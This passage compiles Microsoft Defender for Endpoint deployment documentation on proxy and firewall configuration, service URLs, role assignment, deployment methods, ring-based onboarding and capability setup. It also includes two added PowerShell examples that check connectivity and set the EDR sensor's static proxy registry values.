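Remove both values (Remove-ItemProperty on the same key) when the device no longer needs the static proxy, otherwise the sensor keeps trying the stale address after a topology change.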

Configure the proxy server manually using netsh command

Use netsh to configure a system-wide static proxy.

Note

This will affect all applications including Windows services which use WinHTTP
with default proxy.
Laptops that are changing topology (for example: from office to home) will
malfunction with netsh. Use the registry-based static proxy configuration.

1. Open an elevated command line:

a. Go to Start and type cmd.
b. Right-click Command prompt and select Run as administrator.

2. Enter the following command and press Enter:

Windows Command Prompt

netsh winhttp set proxy <proxy>:<port>

For example: netsh winhttp set proxy 10.0.0.6:8080

Proxy Configuration for down-level devices

Down-level devices include Windows 7 SP1 and Windows 8.1 workstations as well as
Windows Server 2008 R2, and other server operating systems that have been onboarded
previously using the Microsoft Monitoring Agent. These operating systems will have the
proxy configured as part of the Microsoft Management Agent to handle communication
from the endpoint to Azure. Refer to the Microsoft Management Agent Fast
Deployment Guide for information on how a proxy is configured on these devices.

Proxy Service URLs


URLs that include v20 in them are only needed if you have Windows 10, version 1803 or
Windows 11 devices. For example, us-v20.events.data.microsoft.com is only needed if
the device is on Windows 10, version 1803 or Windows 11.

If a proxy or firewall is blocking anonymous traffic, as Microsoft Defender for Endpoint


sensor is connecting from system context, make sure anonymous traffic is permitted in
the listed URLs.

The following downloadable spreadsheet lists the services and their associated URLs
that your network must be able to connect to. Ensure there are no firewall or network
filtering rules that would deny access to these URLs, or you may need to create an allow
rule specifically for them.

Spreadsheet of domains list | Description

Microsoft Defender for Endpoint URL list for commercial customers: Spreadsheet of specific DNS records for service locations, geographic locations, and OS for commercial customers. Download the spreadsheet here.

Microsoft Defender for Endpoint URL list for Gov/GCC/DoD: Spreadsheet of specific DNS records for service locations, geographic locations, and OS for Gov/GCC/DoD customers. Download the spreadsheet here.

Next step

Continue to Step 2 - Assign roles and permissions

Tip

Do you want to learn more? Engage with the Microsoft Security community in our Tech Community: Microsoft Defender for Endpoint Tech Community.


Assign roles and permissions for Microsoft Defender for Endpoint deployment
Article • 10/20/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

The next step when deploying Defender for Endpoint is to assign roles and permissions for the Defender for Endpoint deployment.

Role-based access control

Microsoft recommends using the concept of least privilege. Defender for Endpoint leverages built-in roles within Microsoft Entra ID. Microsoft recommends reviewing the different roles that are available and choosing the right one to solve your needs for each persona for this application. Some roles may need to be applied temporarily and removed after the deployment has been completed.

Personas | Roles | Microsoft Entra role (if necessary) | Assign to

Security Administrator | | |
Security Analyst | | |
Endpoint Administrator | | |
Infrastructure Administrator | | |
Business Owner/Stakeholder | | |

Microsoft recommends using Privileged Identity Management to manage your roles to provide additional auditing, control, and access review for users with directory permissions.

Defender for Endpoint supports two ways to manage permissions:

Basic permissions management: Set permissions to either full access or read-only. Users with Global Administrator or Security Administrator roles in Microsoft Entra ID have full access. The Security reader role has read-only access and does not grant access to view machines/device inventory.

Role-based access control (RBAC): Set granular permissions by defining roles, assigning Microsoft Entra user groups to the roles, and granting the user groups access to device groups. For more information, see Manage portal access using role-based access control.

Microsoft recommends leveraging RBAC to ensure that only users that have a business justification can access Defender for Endpoint.

You can find details on permission guidelines here: Create roles and assign the role to a Microsoft Entra group.

The following example table serves to identify the Cyber Defense Operations Center structure in your environment that will help you determine the RBAC structure required for your environment.

Tier | Description | Permission Required

Tier 1 | Local security operations team / IT team. This team usually triages and investigates alerts contained within their geolocation and escalates to Tier 2 in cases where an active remediation is required. | (none listed)

Tier 2 | Regional security operations team. This team can see all the devices for their region and perform remediation actions. | View data; Alerts investigation; Active remediation actions

Tier 3 | Global security operations team. This team consists of security experts and is authorized to see and perform all actions from the portal. | View data; Alerts investigation; Active remediation actions; Manage portal system settings; Manage security settings

Next step

After assigning roles and permissions to view and manage Defender for Endpoint, it's time for Step 3 - Identify your architecture and choose your deployment method.


Identify Defender for Endpoint architecture and deployment method
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

You've already completed steps to set up your Microsoft Defender for Endpoint deployment and assigned roles and permissions for Defender for Endpoint. Next, plan for onboarding your devices by identifying your architecture and choosing your deployment method.

We understand that every enterprise environment is unique, so we've provided several options to give you the flexibility in choosing how to deploy the service. Deciding how to onboard endpoints to the Defender for Endpoint service comes down to two important steps:

Step 1: Identify your architecture

Depending on your environment, some tools are better suited for certain architectures. Use the table below to decide which Defender for Endpoint architecture best suits your organization.

Architecture | Description

Cloud-native: We recommend using Microsoft Intune to onboard, configure, and remediate endpoints from the cloud for enterprises that don't have an on-premises configuration management solution or are looking to reduce their on-premises infrastructure.

Co-management: For organizations that host both on-premises and cloud-based workloads we recommend using Microsoft's ConfigMgr and Intune for their management needs. These tools provide a comprehensive suite of cloud-powered management features, as well as unique co-management options to provision, deploy, manage, and secure endpoints and applications across an organization.

On-premises: For enterprises that want to take advantage of the cloud-based capabilities of Microsoft Defender for Endpoint while also maximizing their investments in Configuration Manager or Active Directory Domain Services, we recommend this architecture.

Evaluation and local onboarding: We recommend this architecture for SOCs (Security Operations Centers) that are looking to evaluate or run a Microsoft Defender for Endpoint pilot, but don't have existing management or deployment tools. This architecture can also be used to onboard devices in small environments without management infrastructure, such as a DMZ (Demilitarized Zone).

Step 2: Select deployment method

Once you have determined the architecture of your environment and have created an inventory as outlined in the requirements section, use the table below to select the appropriate deployment tools for the endpoints in your environment. This will help you plan the deployment effectively.

Endpoint | Deployment tool

Windows: Local script (up to 10 devices); Group Policy; Microsoft Intune/Mobile Device Manager; Microsoft Configuration Manager; VDI scripts

Windows servers, Linux servers: Integration with Microsoft Defender for Cloud

macOS: Local script; Microsoft Intune; JAMF Pro; Mobile Device Management

Linux servers: Local script; Puppet; Ansible; Chef; Saltstack

Android: Microsoft Intune

iOS: Microsoft Intune; Mobile Application Manager

Note

For devices that aren't managed by Microsoft Intune or Microsoft Configuration Manager, you can use the Security Management for Microsoft Defender for Endpoint to receive security configurations for Microsoft Defender directly from Intune.

Next step

After choosing your Defender for Endpoint architecture and deployment method, continue to Step 4 - Onboard devices.

Onboard to Microsoft Defender for Endpoint
Article • 07/10/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Vulnerability Management
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Onboard devices using any of the supported management tools

The deployment tool you use influences how you onboard endpoints to the service.

To start onboarding your devices:

1. Go to Select deployment method.
2. Choose the Operating System for the devices you wish to onboard.
3. Select the tool you plan to use.
4. Follow the instructions to onboard your devices.

This video provides a quick overview of the onboarding process and the different tools and methods.
https://www.microsoft.com/en-us/videoplayer/embed/RE4bGqr?postJsllMsg=true

Deploy using a ring-based approach

New deployments

A ring-based approach is a method of identifying a set of endpoints to onboard and verifying that certain criteria are met before proceeding to deploy the service to a larger set of devices. You can define the exit criteria for each ring and ensure that they're satisfied before moving on to the next ring. Adopting a ring-based deployment helps reduce potential issues that could arise while rolling out the service.

This table provides an example of the deployment rings you might use:

Deployment ring | Description

Evaluate: Ring 1: Identify 50 devices to onboard to the service for testing.

Pilot: Ring 2: Identify and onboard the next 50-100 endpoints in a production environment. Microsoft Defender for Endpoint supports various endpoints that you can onboard to the service; for more information, see Select deployment method.

Full deployment: Ring 3: Roll out service to the rest of environment in larger increments. For more information, see Get started with your Microsoft Defender for Endpoint deployment.

Exit criteria

An example set of exit criteria for each ring can include:

Devices show up in the device inventory list
Alerts appear in dashboard
Run a detection test
Run a simulated attack on a device

Existing deployments

Windows endpoints

For Windows and/or Windows Servers, you select several machines to test ahead of time (before patch Tuesday) by using the Security Update Validation program (SUVP).

For more information, see:

What is the Security Update Validation Program
Software Update Validation Program and Microsoft Malware Protection Center Establishment - TwC Interactive Timeline Part 4

Non-Windows endpoints

With macOS and Linux, you could take a couple of systems and run in the Beta channel.

Note

Ideally at least one security admin and one developer, so that you are able to find compatibility, performance and reliability issues before the build makes it into the Current channel.

The choice of the channel determines the type and frequency of updates that are offered to your device. Devices in Beta are the first ones to receive updates and new features, followed later by Preview and lastly by Current.

In order to preview new features and provide early feedback, it's recommended that you configure some devices in your enterprise to use either Beta or Preview.

Warning

Switching the channel after the initial installation requires the product to be reinstalled. To switch the product channel: uninstall the existing package, re-configure your device to use the new channel, and follow the steps in this document to install the package from the new location.

Example deployments

To provide some guidance on your deployments, in this section we'll guide you through using two deployment tools to onboard endpoints.

The tools in the example deployments are:

Onboarding using Microsoft Configuration Manager
Onboarding using Microsoft Intune

For some additional information and guidance, check out the PDF or Visio to see the various paths for deploying Defender for Endpoint.

The example deployments will guide you on configuring some of the Defender for Endpoint capabilities, but you'll find more detailed information on configuring Defender for Endpoint capabilities in the next step.

Next step

After onboarding the endpoints, move on to the next step where you'll configure the various capabilities such as endpoint detection and response, next-generation protection, and attack surface reduction.

Step 5 - Configure capabilities


Configure Microsoft Defender for Endpoint capabilities
Article • 07/10/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Important

Some information in this article relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.

Want to experience Defender for Endpoint? Sign up for a free trial.

In this step, you're ready to configure Microsoft Defender for Endpoint capabilities.

Configure capabilities

In many cases, organizations will have existing endpoint security products in place. At a bare minimum this is an antivirus solution, but in some cases an organization might have an existing endpoint detection and response solution.

It is common that Defender for Endpoint will need to exist alongside these existing endpoint security products, either indefinitely or during a cutover period. Fortunately, Defender for Endpoint and the endpoint security suite are modular and can be adopted in a systematic approach.

Onboarding devices effectively enables the endpoint detection and response capability of Microsoft Defender for Endpoint. After onboarding the devices, you'll then need to configure the other capabilities of the service. The following table lists the capabilities you can configure to get the best protection for your environment and the order Microsoft recommends for how the endpoint security suite should be enabled.

Capability | Description | Adoption Order Rank

Endpoint Detection & Response (EDR) | Defender for Endpoint endpoint detection and response capabilities provide advanced attack detections that are near real-time and actionable. Security analysts can prioritize alerts effectively, gain visibility into the full scope of a breach, and take response actions to remediate threats. | 1

Configure Microsoft Defender Vulnerability Management | Defender Vulnerability Management is a component of Microsoft Defender for Endpoint, and provides both security administrators and security operations teams with unique value, including:
- Real-time endpoint detection and response (EDR) insights correlated with endpoint vulnerabilities.
- Invaluable device vulnerability context during incident investigations.
- Built-in remediation processes through Microsoft Intune and Microsoft System Center Configuration Manager. | 2

Configure Next-generation protection (NGP) | Microsoft Defender Antivirus is a built-in antimalware solution that provides next-generation protection for desktops, portable computers, and servers. Microsoft Defender Antivirus includes:
- Cloud-delivered protection for near-instant detection and blocking of new and emerging threats. Along with machine learning and the Intelligent Security Graph, cloud-delivered protection is part of the next-gen technologies that power Microsoft Defender Antivirus.
- Always-on scanning using advanced file and process behavior monitoring and other heuristics (also known as "real-time protection").
- Dedicated protection updates based on machine learning, human and automated big-data analysis, and in-depth threat resistance research. | 3

Configure attack surface reduction | Attack surface reduction capabilities in Microsoft Defender for Endpoint help protect the devices and applications in the organization from new and emerging threats. | 4

Configure Auto Investigation & Remediation (AIR) capabilities | Microsoft Defender for Endpoint uses Automated investigations to significantly reduce the volume of alerts that need to be investigated individually. The Automated investigation feature leverages various inspection algorithms and processes used by analysts (such as playbooks) to examine alerts and take immediate remediation action to resolve breaches. This significantly reduces alert volume, allowing security operations experts to focus on more sophisticated threats and other high value initiatives. | Not applicable

Configure Microsoft Defender Experts capabilities | Microsoft Experts is a managed hunting service that provides Security Operation Centers (SOCs) with expert level monitoring and analysis to help them ensure that critical threats in their unique environments don't get missed. | Not applicable

For more information, see Supported Microsoft Defender for Endpoint capabilities by platform.


STEP 1: Configure your network environment to ensure connectivity with Defender for Endpoint service
Article • 02/01/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Important

Some information in this article relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.

Before you onboard devices to Defender for Endpoint, make sure your network is configured to connect to the service. The first step of this process involves adding URLs to the allowed domains list if your proxy server or firewall rules prevent access to Defender for Endpoint. This article also includes information about proxy and firewall requirements for older versions of Windows client and Windows Server.

Enable access to Microsoft Defender for Endpoint service URLs in the proxy server

By default, if a proxy or firewall is blocking all traffic and allowing only specific domains, then add the domains listed in the downloadable sheet to the allowed domains list.

The following downloadable spreadsheet lists the services and their associated URLs that your network must be able to connect to. Ensure there are no firewall or network filtering rules that deny access to these URLs. Optionally, you may need to create an allow rule specifically for them.

Note (Applies to public preview)

As part of the preview, certain Defender for Endpoint services are consolidated behind the URL *.endpoint.security.microsoft.com. You have the option to use the reduced set of URLs in Microsoft Defender XDR for Defender for Endpoint. You also have the new option of configuring allow lists using static Defender for Endpoint dedicated IP ranges. For more information, see onboarding devices using streamlined method and review the updated list in the following table.

To use the new onboarding method, devices must meet specific prerequisites and use a new onboarding package. For more information, see prerequisites. You can migrate previously onboarded devices. See migrating devices to streamlined connectivity.

Certain services are not included in this consolidation. You must verify that you maintain connectivity with the required services. For details on services not included in the consolidation, see the streamlined URL sheet or onboarding devices using streamlined method.

Devices running the MMA agent are not supported under the streamlined solution and must be onboarded using the down-level method. For a list of required URLs, see the MMA tab in the streamlined URL list. Devices running legacy Windows version 1607, 1703, 1709, or 1803 can onboard using the new onboarding package but still require a longer list of URLs. For more information, see the following table.

Spreadsheet of domains list | Description

Microsoft Defender for Endpoint consolidated URL list (NEW - Streamlined):
IMPORTANT: Currently in public preview. Spreadsheet of consolidated URLs for streamlining device connectivity. Download the spreadsheet here.
Applicable OS (for complete list, see streamlined connectivity):
- Windows 10 1809+
- Windows 11
- Windows Server 2019
- Windows Server 2022
- Windows Server 2012 R2, Windows Server 2016 R2 running Defender for Endpoint modern unified solution (requires installation through MSI).
- macOS supported versions running 101.23102.* +
- Linux supported versions running 101.23102.* +
Minimum component versions:
- Antimalware client: 4.18.2211.5
- Engine: 1.1.19900.2
- Security intelligence: 1.391.345.0
- Xplat version: 101.23102.* +
- Sensor/ KB version: >10.8040.*/ March 8, 2022+
If you are moving previously onboarded devices to the streamlined approach, see Migrating device connectivity.

Microsoft Defender for Endpoint URL list for commercial customers (Standard):
Spreadsheet of specific DNS records for service locations, geographic locations, and OS for commercial customers. Download the spreadsheet here. Microsoft Defender for Endpoint Plan 1 and Plan 2 share the same proxy service URLs.

Microsoft Defender for Endpoint URL list for Gov/GCC/DoD:
Spreadsheet of specific DNS records for service locations, geographic locations, and OS for Gov/GCC/DoD customers. Download the spreadsheet here.

Note

1. Windows 10 version 1607, 1703, 1709, 1803 (RS1-RS4) are supported on the onboarding package but require a longer URL list (see updated URL sheet). These versions do not support reonboarding (must be fully offboarded first).
2. Devices running on Windows 7, Windows 8.1, Windows Server 2008 R2 MMA, and servers not upgraded to Unified Agent (MMA) will need to continue using the MMA onboarding method.

If a proxy or firewall has HTTPS scanning (SSL inspection) enabled, exclude the domains
listed in the above table from HTTPS scanning. In your firewall, open all the URLs where
the geography column is WW. For rows where the geography column isn't WW, open
the URLs to your specific data location. To verify your data location setting, see Verify
data storage location and update data retention settings for Microsoft Defender for
Endpoint. Don't exclude the URL *.blob.core.windows.net from any kind of network
inspection. Instead, exclude only the blob URLs that are specific to MDE and listed in the
spreadsheet of domains list.

Note

Applies to standard set of URLs:

Windows devices running with version 1803 or earlier need settings-win.data.microsoft.com.

URLs that include v20 in them are only needed if you have Windows devices running version 1803 or later. For example, us-v20.events.data.microsoft.com is needed for a Windows device running version 1803 or later and onboarded to the US Data Storage region.

If a proxy or firewall is blocking anonymous traffic from the Defender for Endpoint sensor and it's connecting from system context, it's important to make sure anonymous traffic is permitted in your proxy or firewall for the previously listed URLs.

Note

Microsoft does not provide a proxy server. These URLs are accessible via the proxy server that you configure.

Important

In compliance with Defender for Endpoint security and compliance standards, your data will be processed and stored in accordance with your tenant's physical location. Based on client location, traffic may flow through any of these IP regions (which correspond to Azure datacenter regions). For more information, see Data storage and privacy.

Microsoft Monitoring Agent (MMA) - proxy and firewall requirements for older versions of Windows client or Windows Server

Note (Applies to public preview)

Services using MMA-based solutions are not able to leverage the new streamlined connectivity solution (consolidated URL and option to use static IPs). For Windows Server 2016 and Windows Server 2012 R2, you will need to update to the new unified solution.

The information in the list of proxy and firewall configuration information is required to communicate with the Log Analytics agent (often referred to as Microsoft Monitoring Agent) for previous versions of Windows, such as Windows 7 SP1, Windows 8.1, and Windows Server 2008 R2*.

Agent Resource                 | Ports    | Direction | Bypass HTTPS inspection
*.ods.opinsights.azure.com     | Port 443 | Outbound  | Yes
*.oms.opinsights.azure.com     | Port 443 | Outbound  | Yes
*.blob.core.windows.net        | Port 443 | Outbound  | Yes
*.azure-automation.net         | Port 443 | Outbound  | Yes

Note

These connectivity requirements apply to the previous Microsoft Defender for Endpoint solution for Windows Server 2016 and Windows Server 2012 R2 that requires MMA. Instructions to onboard these operating systems with the new unified solution are at Onboard Windows servers, or migrate to the new unified solution at Server migration scenarios in Microsoft Defender for Endpoint.

Note

As a cloud-based solution, the IP range can change. It's recommended that you move to a DNS-resolving setting.

Onboard devices without Internet access

For devices with no direct internet connection, the use of a proxy solution is the recommended approach. For older Windows devices onboarded using the previous, MMA-based solution, the use of the OMS gateway solution provides an alternative approach.

Note (Applies to public preview)

With this preview, you can leverage firewall devices with static IP ranges. For more information, see: Streamlined device connectivity and streamlined URL list.

For more information about onboarding methods, see the following articles:

Onboard previous versions of Windows
Onboard servers to the Microsoft Defender for Endpoint service

Important

Microsoft Defender for Endpoint is a Cloud security solution. "Onboard devices without Internet access" means that Internet access for the endpoints must be configured through a proxy. Microsoft Defender for Endpoint does not support endpoints without direct or proxy Internet access. A system-wide proxy configuration is recommended.
Windows or Windows Server in disconnected environments must be able to update Certificate Trust Lists offline via an internal file or web server. For more information about updating CTLs offline, see Configure a file or web server to download the CTL files.

Devices running Windows 10 or later, Windows Server 2012 R2 or later, Linux and macOS

Depending on the operating system, the proxy to be used for Microsoft Defender for Endpoint can be configured automatically, typically by using autodiscovery or an autoconfig file, or statically specific to Defender for Endpoint services running on the device.

For Windows devices, see Configure device proxy and Internet connectivity settings
For Linux devices, see Configure Microsoft Defender for Endpoint on Linux for static proxy discovery
For macOS devices, see Microsoft Defender for Endpoint on Mac

Windows devices running the previous MMA-based solution

Note

An OMS gateway server cannot be used as proxy for disconnected Windows or Windows Server devices when configured via 'TelemetryProxyServer' registry or GPO. For Windows or Windows Server, while you may use TelemetryProxyServer, it must point to a standard proxy device or appliance.

Set up Azure Log Analytics (formerly known as OMS Gateway) to act as proxy or hub: Azure Log Analytics Agent
Install and configure Microsoft Monitoring Agent (MMA) to point to the Defender for Endpoint Workspace key & ID

Onboard previous versions of Windows

Note

Any client that has no access to the internet cannot be onboarded to Microsoft Defender for Endpoint. A client must either have access to the required URLs directly, or it must have access via a proxy or firewall.
As part of the streamlined preview, you can now leverage IP addresses as alternatives to certain Defender for Endpoint service URLs.

Confirm Microsoft Monitoring Agent (MMA) Service URL Requirements

See the following guidance to eliminate the wildcard (*) requirement for your specific environment when using the Microsoft Monitoring Agent (MMA) for previous versions of Windows.

1. Onboard a previous operating system with the Microsoft Monitoring Agent (MMA) into Defender for Endpoint (for more information, see Onboard previous versions of Windows on Defender for Endpoint and Onboard Windows servers).
2. Ensure the machine is successfully reporting into the Microsoft Defender portal.
3. Run the TestCloudConnection.exe tool from C:\Program Files\Microsoft Monitoring Agent\Agent to validate the connectivity, and to get the required URLs for your specific workspace.
4. Check the Microsoft Defender for Endpoint URLs list for the complete list of requirements for your region (refer to the Service URLs Spreadsheet).

The wildcards (*) used in *.ods.opinsights.azure.com, *.oms.opinsights.azure.com, and *.agentsvc.azure-automation.net URL endpoints can be replaced with your specific Workspace ID. The Workspace ID is specific to your environment and workspace. It can be found in the Onboarding section of your tenant within the Microsoft Defender portal.

The *.blob.core.windows.net URL endpoint can be replaced with the URLs shown in the "Firewall Rule: *.blob.core.windows.net" section of the test results.

Note

In the case of onboarding via Microsoft Defender for Cloud, multiple workspaces can be used. You will need to perform the TestCloudConnection.exe procedure on the onboarded machine from each workspace (to determine if there are any changes to the *.blob.core.windows.net URLs between the workspaces).
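The substitution above is mechanical, so it is easy to script. The following PowerShell is an added example, not Microsoft's tooling: it replaces each wildcard with the Workspace ID, takes the blob hostnames copied from the TestCloudConnection.exe results as input, and checks TCP 443 reachability of every resulting hostname so the allow list can be verified before the wildcard rules are removed. The workspace ID shown is a placeholder.

```powershell
# Added example (not from the Microsoft documentation). Builds the
# workspace-specific hostnames that replace the MMA wildcard entries and
# tests TCP 443 to each. Function names are the example's own.

function Get-MmaWorkspaceUrl {
    param(
        # Log Analytics workspace ID (a GUID) from the portal's Onboarding section.
        [Parameter(Mandatory)][string]$WorkspaceId,
        # Blob hostnames copied from the "Firewall Rule: *.blob.core.windows.net"
        # section of the TestCloudConnection.exe output, if any.
        [string[]]$BlobHost = @()
    )
    if ($WorkspaceId -notmatch '^[0-9a-fA-F]{8}(-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}$') {
        throw "WorkspaceId should be a GUID, got '$WorkspaceId'"
    }
    $wildcards = @(
        '*.ods.opinsights.azure.com',
        '*.oms.opinsights.azure.com',
        '*.agentsvc.azure-automation.net'
    )
    foreach ($w in $wildcards) {
        # The wildcard label is the workspace ID, e.g. <id>.ods.opinsights.azure.com
        [pscustomobject]@{ Wildcard = $w; Host = $w.Replace('*', $WorkspaceId) }
    }
    foreach ($b in $BlobHost) {
        # Blob hosts are not derivable from the workspace ID; they come from the test tool.
        if ($b -notlike '*.blob.core.windows.net') { throw "Not a blob host: $b" }
        [pscustomobject]@{ Wildcard = '*.blob.core.windows.net'; Host = $b }
    }
}

function Test-MmaWorkspaceConnectivity {
    param(
        [Parameter(Mandatory)][string]$WorkspaceId,
        [string[]]$BlobHost = @()
    )
    Get-MmaWorkspaceUrl -WorkspaceId $WorkspaceId -BlobHost $BlobHost | ForEach-Object {
        # Direct TCP probe on 443; does not prove HTTPS inspection is bypassed.
        $r = Test-NetConnection -ComputerName $_.Host -Port 443 -WarningAction SilentlyContinue
        [pscustomobject]@{
            Host             = $_.Host
            ReplacesWildcard = $_.Wildcard
            Tcp443           = $r.TcpTestSucceeded
        }
    }
}

# Placeholder workspace ID; replace with the tenant's own value.
Test-MmaWorkspaceConnectivity -WorkspaceId '00000000-0000-0000-0000-000000000000' |
    Format-Table -AutoSize
```

Test-NetConnection connects directly rather than through the agent's proxy, so on a proxy-only device the probe can fail while the agent still reports; TestCloudConnection.exe remains the authoritative check.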

Next step

STEP 2: Configure your devices to connect to the Defender for Endpoint service using a proxy


STEP 2: Configure your devices to connect to the Defender for Endpoint service using a proxy
Article • 10/25/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Important

Devices that are configured for IPv6-only traffic are not supported.

The Defender for Endpoint sensor requires Microsoft Windows HTTP (WinHTTP) to report sensor data
and communicate with the Defender for Endpoint service. The embedded Defender for Endpoint sensor
runs in system context using the LocalSystem account.

 Tip

For organizations that use forward proxies as a gateway to the Internet, you can use network
protection to investigate connection events that occur behind forward proxies.

The WinHTTP configuration setting is independent of the Windows Internet (WinINet) browsing proxy
settings (see WinINet vs. WinHTTP). WinHTTP can only discover a proxy server by using the following
discovery methods:

Autodiscovery methods:

Transparent proxy

Web Proxy Auto-discovery Protocol (WPAD)

Note

If you're using Transparent proxy or WPAD in your network topology, you don't need special
configuration settings.

Manual static proxy configuration:

Registry-based configuration

WinHTTP configured using netsh command: Suitable only for desktops in a stable topology (for
example: a desktop in a corporate network behind the same proxy)

Note

Defender Antivirus and EDR proxies can be set independently. In the sections that follow, be aware
of those distinctions.

Configure the proxy server manually using a registry-based static proxy
Configure a registry-based static proxy for the Defender for Endpoint detection and response (EDR)
sensor to report diagnostic data and communicate with Defender for Endpoint services if a computer
isn't permitted to connect to the Internet.

Note

When using this option on Windows 10, Windows 11, Windows Server 2019, or Windows Server 2022,
it is recommended to have the following (or later) build and cumulative update rollup:

Windows 11
Windows 10, version 1809 or Windows Server 2019, or Windows Server 2022 -
https://support.microsoft.com/kb/5001384
Windows 10, version 1909 - https://support.microsoft.com/kb/4601380
Windows 10, version 2004 - https://support.microsoft.com/kb/4601382
Windows 10, version 20H2 - https://support.microsoft.com/kb/4601382

These updates improve the connectivity and reliability of the CnC (Command and Control) channel.

The static proxy is configurable through Group Policy (GP). Both of the following Group Policy
settings must be configured to point the EDR sensor at the proxy server. The policies are available
under Administrative Templates.

Administrative Templates > Windows Components > Data Collection and Preview Builds >
Configure Authenticated Proxy usage for the Connected User Experience and Telemetry Service.

Set it to Enabled and select Disable Authenticated Proxy usage.

Administrative Templates > Windows Components > Data Collection and Preview Builds >
Configure connected user experiences and telemetry:

Configure the proxy.

Group Policy: Configure authenticated proxy usage for the connected user experience and the
telemetry service
Registry key: HKLM\Software\Policies\Microsoft\Windows\DataCollection
Registry entry: DisableEnterpriseAuthProxy
Value: 1 (REG_DWORD)

Group Policy: Configure connected user experiences and telemetry
Registry key: HKLM\Software\Policies\Microsoft\Windows\DataCollection
Registry entry: TelemetryProxyServer
Value: servername:port or ip:port (REG_SZ). For example: 10.0.0.6:8080

Note

If you are using the 'TelemetryProxyServer' setting on devices that are otherwise completely offline,
meaning the operating system is unable to connect for the online certificate revocation list or
Windows Update, then it is required to add the additional registry setting
PreferStaticProxyForHttpRequest with a value of 1.

The parent registry path location for "PreferStaticProxyForHttpRequest" is
"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection".

The following command can be used to insert the registry value in the correct location:

Console

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection" /v PreferStaticProxyForHttpRequest /t REG_DWORD /d 1 /f

The above registry value is applicable only starting with MsSense.exe version 10.8210.* and later, or
version 10.8049.* and later.
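The following PowerShell script is an added example; it is not part of the Microsoft documentation or the product. It writes the two DataCollection values from the table above and, optionally, the PreferStaticProxyForHttpRequest value from the note, then reads them back so the change can be verified before the device is restarted. The script name Set-MdeEdrStaticProxy.ps1, the parameter names and the host:port validation pattern are assumptions; 10.0.0.6:8080 is the documentation's sample address.

```powershell
# Added example, not from the Microsoft documentation: configure the registry-based
# static proxy for the Defender for Endpoint EDR sensor and read the values back.
# Run from an elevated PowerShell session, for example:
#   .\Set-MdeEdrStaticProxy.ps1 -ProxyAddress 10.0.0.6:8080 -FullyOffline
param(
    # servername:port or ip:port, without an http:// prefix (the documented REG_SZ format)
    [Parameter(Mandatory = $true)]
    [string]$ProxyAddress,
    # Also set PreferStaticProxyForHttpRequest=1 for devices that cannot reach CRL or Windows Update
    [switch]$FullyOffline
)

# Assumed validation pattern: hostname or IPv4 address, a colon, and a port number
if ($ProxyAddress -notmatch '^[A-Za-z0-9.\-]+:\d{1,5}$') {
    throw "ProxyAddress must be servername:port or ip:port, got '$ProxyAddress'"
}

$dataCollection = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\DataCollection'
$atpPolicy      = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection'

foreach ($key in @($dataCollection, $atpPolicy)) {
    if (-not (Test-Path -Path $key)) { New-Item -Path $key -Force | Out-Null }
}

# Registry equivalent of the two Group Policy settings in the table above
New-ItemProperty -Path $dataCollection -Name 'DisableEnterpriseAuthProxy' `
    -PropertyType DWord -Value 1 -Force | Out-Null
New-ItemProperty -Path $dataCollection -Name 'TelemetryProxyServer' `
    -PropertyType String -Value $ProxyAddress -Force | Out-Null

if ($FullyOffline) {
    # Same value the "reg add" command in the note writes; honoured only by
    # MsSense.exe 10.8210.* / 10.8049.* and later
    New-ItemProperty -Path $atpPolicy -Name 'PreferStaticProxyForHttpRequest' `
        -PropertyType DWord -Value 1 -Force | Out-Null
}

# Read the values back so the change can be verified (and logged) before a restart
$dc  = Get-ItemProperty -Path $dataCollection
$atp = Get-ItemProperty -Path $atpPolicy -ErrorAction SilentlyContinue
[pscustomobject]@{
    DisableEnterpriseAuthProxy      = $dc.DisableEnterpriseAuthProxy
    TelemetryProxyServer            = $dc.TelemetryProxyServer
    PreferStaticProxyForHttpRequest = $atp.PreferStaticProxyForHttpRequest
}
```

If the same values are delivered by Group Policy, the next policy refresh will overwrite whatever the script wrote, so on domain-joined devices treat this as a local test or a break-glass fix and keep the Group Policy objects as the source of truth.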

Configure a static proxy for Microsoft Defender Antivirus
Microsoft Defender Antivirus cloud-delivered protection provides near-instant, automated protection
against new and emerging threats. Note that this connectivity is required for custom indicators when
Defender Antivirus is your active anti-malware solution, and for EDR in block mode when a
non-Microsoft solution is the primary anti-malware solution.

Configure the static proxy using the Group Policy available in Administrative Templates:

1. Administrative Templates > Windows Components > Microsoft Defender Antivirus > Define
proxy server for connecting to the network.

2. Set it to Enabled and define the proxy server. Note, the URL must have either http:// or https://. For
supported versions for https://, see Manage Microsoft Defender Antivirus updates.

3. Under the registry key HKLM\Software\Policies\Microsoft\Windows Defender , the policy sets the
registry value ProxyServer as REG_SZ.

The registry value ProxyServer takes the following string format:

<server name or ip>:<port>

For example: http://10.0.0.6:8080

Note

If you are using the static proxy setting on devices that are otherwise completely offline, meaning the
operating system is unable to connect for the online certificate revocation list or Windows Update,
then it is required to add the additional registry setting SSLOptions with a DWORD value of 0. The
parent registry path location for "SSLOptions" is
"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet".

